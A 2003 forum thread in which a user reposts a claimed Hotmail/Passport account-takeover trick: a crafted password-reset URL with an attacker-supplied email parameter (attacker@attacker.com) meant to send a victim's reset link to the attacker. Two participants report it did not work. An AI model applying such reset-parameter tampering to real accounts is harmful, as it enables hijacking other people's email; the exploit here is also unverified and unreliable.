Hotmail accounts exploit!

lonny · May 9, 2003

Slightly off-topic, but HUGELY important!

from: [link removed because site linked contains material not accepted here. -gia.]

Attacker enters this URL into their browser, replacing email addresses appropriately.

https://register.passport.net/email...om&id=&cb=&prefem=attacker@attacker.com&rst=1

And you'll get an email at the attacker's email address asking you to click on a url like this:

http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033

From that url, you can reset the password.

---------

Seems to work. Scary.

Giaguara · May 9, 2003

I tried it. At least didn't work for me. I didn't get the hotmail address tried (err, mine) to be reset to get the new one to the email address i requested. In the email address i specified to send the mail to, i got nothing. Did you try this, or just saw it?

sorry for having removed the link, but on the first page of it i saw material strictly forbidden here.

lonny · May 9, 2003

Yep, you seem to be right. First step works, but I got no email either. Scary nonetheless...

Sorry about the link, I got there surfing from an anti-MS site and didn't notice any forbidden material...

Giaguara · May 9, 2003

well, it had an s-box. and that is a bad word here.

Hotmail accounts exploit!

lonny

Fearless Thinker

Giaguara

Chmod 760

lonny

Fearless Thinker

Giaguara

Chmod 760